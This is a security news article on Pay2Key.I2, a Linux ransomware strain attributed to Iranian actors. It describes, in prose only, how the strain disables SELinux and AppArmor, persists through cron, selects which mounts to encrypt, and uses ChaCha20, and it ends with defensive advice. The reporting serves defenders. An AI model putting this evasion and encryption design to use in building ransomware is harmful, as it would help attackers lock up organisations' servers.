Linux has long been considered a more secure operating system than Windows, but that reputation is being tested.
A ransomware group known as Pay2Key, attributed to Iranian threat actors, has developed a Linux variant that is actively targeting organizational servers, virtualization hosts, and cloud workloads.
The malware was first detected in the wild in late August 2025, and its technical design shows that its operators built it for scale, reliability, and speed rather than stealth.
Pay2Key is not a new name in the threat landscape. The group had periods of reduced activity, but this Linux-specific variant signals a deliberate shift in targeting strategy.
Unlike traditional ransomware that focuses on desktop environments, Pay2Key’s Linux build goes straight for the infrastructure layer — the servers and systems that organizations depend on daily.
Once it gets inside, it does not just encrypt files; it systematically dismantles the defenses that might slow it down.
Morphisec researchers identified the malware sample and noted that Pay2Key.I2, the Linux variant, is configuration-driven and requires root-level privileges to execute.
This means the ransomware runs with the highest level of system access, giving it full control over the file system and core OS functions.
The operators are not relying on post-execution privilege escalation — they build the payload to run only once full access is already in place.
The impact of this ransomware on organizations running Linux-based infrastructure is significant. Servers that host databases, application backends, and virtual machines become prime targets.
Cloud workloads, which many businesses now depend on for continuous and uninterrupted operations, are equally at risk.
The malware’s ability to classify different types of mounted file systems and selectively encrypt them means it can cause maximum damage while keeping the host operational enough to deliver a ransom demand.
The broader concern is that Linux ransomware remains one of the least documented threat categories in public security research.
.webp)
Pay2Key’s Linux build is a clear example of how threat actors are filling that gap — developing tools that many organizations are simply not yet prepared to defend against.
Encryption Mechanism and Defense Evasion
Before Pay2Key begins encrypting files, it first prepares the environment to ensure nothing gets in its way.
The malware stops running services, kills active processes, and disables two major Linux security frameworks — SELinux and AppArmor.
This effectively strips the host of its active security defenses before the encryption routine even starts.
To guarantee survival beyond a reboot, the malware installs a cron entry that triggers it again at system restart.
This persistence mechanism means that even if a system admin detects something wrong and reboots the server, the ransomware picks up right where it left off.
For file targeting, Pay2Key enumerates /proc/mounts to build a map of the file system. It filters out pseudo-filesystems and classifies mounts as read-only, removable, or other.
It skips read-only mounts entirely, and during per-file processing, deliberately avoids ELF and MZ binaries along with zero-length files — reducing the chance of crashing the host mid-operation.
The encryption uses the ChaCha20 algorithm in either full-file or partial mode, determined by the configuration file.
A hardcoded string, "DontDecompileMePlease", is embedded in the binary and plays a key role in both metadata key derivation and metadata layout validation.
Per-file keys are generated and stored in an obfuscated metadata block, making recovery without the decryption key practically impossible.
Security teams running Linux-based infrastructure should enforce strict controls on root-level access and audit which accounts carry elevated privileges.
Disabling unnecessary cron job creation capabilities for non-administrative users can reduce the risk of persistence mechanisms taking hold.
Organizations should also actively monitor for any unexpected disabling of SELinux or AppArmor, as this is a strong indicator of active ransomware execution.
Maintaining offline, immutable backups of critical data remains one of the most effective ways to recover without paying a ransom.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
